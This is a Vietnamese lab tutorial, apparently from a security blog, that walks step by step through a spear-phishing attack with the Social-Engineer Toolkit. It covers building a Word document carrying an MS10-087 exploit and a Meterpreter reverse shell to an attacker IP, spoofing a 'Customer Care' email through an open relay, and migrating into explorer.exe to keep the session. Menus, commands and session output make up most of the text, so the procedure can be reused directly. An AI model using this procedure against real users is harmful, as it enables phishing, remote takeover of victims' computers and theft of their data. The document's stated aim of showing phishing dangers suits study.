Như chúng ta đã biết phishing là hình thức gửi những email có nôi dung lừa đảo đến người dùng trong hệ thống. Thực tế cho thấy rằng việc tấn công vào các hệ thống đa số đều từ người dùng cuối. Chúng ta có thể hiểu rằng thay vì tìm ra hay tấn công vào các máy chủ, các tài khoản của người quản trị thì chúng ta tấn công vào những người dùng văn phòng ít bảo mật hơn sau đó dùng các biện pháp leo thang đặc quyền để do thám đánh cắp những thông tin nhậy cảm. Trong bài viết này tôi nói đến việc giả mạo gửi mail khác lỗ hổng bảo mật từ những tài liệu văn bản hay còn gọi là File Format. Bài lab sẽ demo hình thứ giả mạo email, tấn công vào lỗ hổng Word 2007 cho phép hacker gán quyền meterpreter shell và chiếm đoạt hệ thống.
Bước 1: quay trở lại màn hình đầu tiên của “SET”. Nhập vào 1 “Social-Engineering Attacks”
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
Select from the menu:
1) Social–Engineering Attacks
2) Fast–Track Penetration Testing
3) Third Party Modules
4) Update the Social–Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social–Engineer Toolkit
set> 1
|
Bước 2: nhập vào 1 “Spear-Phishing Attack Vectors”
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
Select from the menu:
1) Spear–Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino–Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 1
|
Bước 3: nhập vào 2 “Create a FileFormat Payload” . Tạo payload dưới dạng files văn bản
|
1
2
3
4
5
6
7
8
|
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social–Engineering Template
99) Return to Main Menu
set:phishing>2
|
Bước 4: chọn payload. Ở đây tôi chọn 5. Tấn công vào lỗ hổng bảo mật nguy hiểmMS10-087 trên Micsosoft Office 2003 – 2010
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) MS14–017 Microsoft Word RTF Object Confusion (2014–04–01)
4) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
5) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10–087)
6) Adobe Flash Player “Button” Remote Code Execution
7) Adobe CoolType SING Table “uniqueName” Overflow
8) Adobe Flash Player “newfunction” Invalid Pointer Use
9) Adobe Collab.collectEmailInfo Buffer Overflow
10) Adobe Collab.getIcon Buffer Overflow
11) Adobe JBIG2Decode Memory Corruption Exploit
12) Adobe PDF Embedded EXE Social Engineering
13) Adobe util.printf() Buffer Overflow
14) Custom EXE to VBA (sent via RAR) (RAR required)
15) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
16) Adobe PDF Embedded EXE Social Engineering (NOJS)
17) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
18) Apple QuickTime PICT PnSize Buffer Overflow
19) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
20) Adobe Reader u3D Memory Corruption Vulnerability
21) MSCOMCTL ActiveX Buffer Overflow (ms12–027)
set:payloads>5
|
Chọn tiếp 2 để tạo meterpreter reverse_shell
|
1
2
3
4
5
6
7
8
9
10
|
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
set:payloads>
|
Gõ tiếp địa chỉ IP Attacker , port listener
|
1
2
3
|
set> IP address for the payload listener: 10.0.0.131
set:payloads> Port to connect back on [443]:443
|
Bước 5: chọn 2 đổi tên files . Ở đây tôi sẽ đổi tên files gửi cho nạn nhân là daily.doc
|
1
2
3
4
5
6
7
8
9
10
|
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don‘t care.
2. Rename the file, I want to be cool.
set:phishing>2
set:phishing> New filename:daily.doc
|
Bước 6: trong bước này để tấn công hàng loạt email chọn 2. Nhưng tôi chỉ demo 1email nên chọn 1.
|
1
2
3
4
5
6
7
8
9
|
What do you want to do:
1. E–Mail Attack Single Email Address
2. E–Mail Attack Mass Mailer
99. Return to main menu.
set:phishing>1
|
Bước 7: gõ 1 chọn mẫu template đã có sẵn. Tôi chọn mẫu status reports
|
1
2
3
4
5
6
7
8
|
Do you want to use a predefined template or craft
a one time email template.
1. Pre–Defined Template
2. One–Time Use Email Template
set:phishing>1
|
chọn 10. Status Report
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
[–] Available templates:
1: Baby Pics
2: Strange internet usage from your computer
3: Computer Issue
4: Order Confirmation
5: Dan Brown‘s Angels & Demons
6: New Update
7: How long has it been?
8:
9: Have you seen this?
10: Status Report
11: WOAAAA!!!!!!!!!! This is crazy...
set:phishing>10
|
Bước 8: thiết lập các giá trị gửi, người nhận, smtp.
|
1
2
3
4
5
6
7
|
set:phishing> Send email to:victim@vuquyhoa.com
1. Use a gmail Account for your email attack.
2. Use your own server or open relay
set:phishing>2
|
Chọn 2: gửi bằng SMTP replay . Option 1 hiện nay khó hoạt động vì Gmail đã chặn.
|
1
2
3
4
5
6
7
8
9
10
|
set:phishing> From address (ex: moo@example.com):me@vuquyhoa.com
set:phishing> The FROM NAME user will see: :Customer Care
set:phishing> Username for open–relay [blank]:me@vuquyhoa.com
Password for open–relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):xx.xx.xx.xx
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
[*] SET has finished delivering the emails
set:phishing> Setup a listener [yes|no]:yes
|
Listener chọn yes để “SET” tự động khởi động MSF lắng nghe kết nối
Bước 9: Qua máy victim kiểm tra email. Download và Open văn bản
Email đã được gửi đến hòm mail của victim
Download tập tin đính kèm và mở bằng Word 2007 mặc định
Sau khi mở thấy Word ở trạng thái treo
Quay trờ lại máy của Attacker đã thấy có meterpreter shell.
|
1
2
3
4
5
6
7
|
[*] Started reverse handler on 10.0.0.131:443
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 10.0.0.4
[*] Meterpreter session 1 opened (10.0.0.131:443 -> 10.0.0.4:49207) at 2014–09–06 03:07:12 –0400
msf exploit(handler) >
|
Kết nối vào session meterpreter . Migrate sang process explorer.exe tránh trường hợp victim tắt Word thì mất kết nối.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
|
msf exploit(handler) > sessions –i 1
[*] Starting interaction with 1…
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
—– —— —— —— ———– —— ——
0 0 [System Process] 4294967295
4 0 System x86 0
256 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
352 328 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
364 512 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
408 328 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
416 400 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
452 400 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
512 408 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
520 408 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
528 408 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
628 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
700 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
788 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
844 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
872 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1044 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1156 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1296 512 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1324 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1360 4016 chrome.exe x86 1 CL01–W7\user1 C:\Program Files\Google\Chrome\Application\chrome.exe
1428 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1476 512 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1552 4016 WINWORD.EXE x86 1 CL01–W7\user1 C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
1692 512 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1780 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1996 512 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
2052 872 taskeng.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\taskeng.exe
2064 844 dwm.exe x86 1 CL01–W7\user1 C:\Windows\system32\Dwm.exe
2104 1956 explorer.exe x86 1 CL01–W7\user1 C:\Windows\Explorer.EXE
2112 512 taskhost.exe x86 1 CL01–W7\user1 C:\Windows\system32\taskhost.exe
2332 2052 GoogleUpdate.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Google\Update\GoogleUpdate.exe
2352 1692 TPAutoConnect.exe x86 1 CL01–W7\user1 C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2360 416 conhost.exe x86 1 CL01–W7\user1 C:\Windows\system32\conhost.exe
2428 2104 vmtoolsd.exe x86 1 CL01–W7\user1 C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2692 4016 chrome.exe x86 1 CL01–W7\user1 C:\Program Files\Google\Chrome\Application\chrome.exe
2804 512 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe
2896 512 wmpnetwk.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe
3200 628 WmiPrvSE.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wbem\wmiprvse.exe
3656 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4016 2104 chrome.exe x86 1 CL01–W7\user1 C:\Program Files\Google\Chrome\Application\chrome.exe
meterpreter > migrate 2104
[*] Migrating from 1552 to 2104…
[*] Migration completed successfully.
meterpreter >
|
Lúc nào Word trên máy nạn nhận tự động tắt đi và trên máy tính của Attacker đã có meterpreter shell cho phép khai thác tất cả thông tin trên máy nạn nhân. Qua bài viết này các bạn đã thấy được sự nguy hiểm liên quan đến việc tấn công phishing cũng như sự nguy hiểm của những files tài liệu văn bản sử dụng hàng ngày.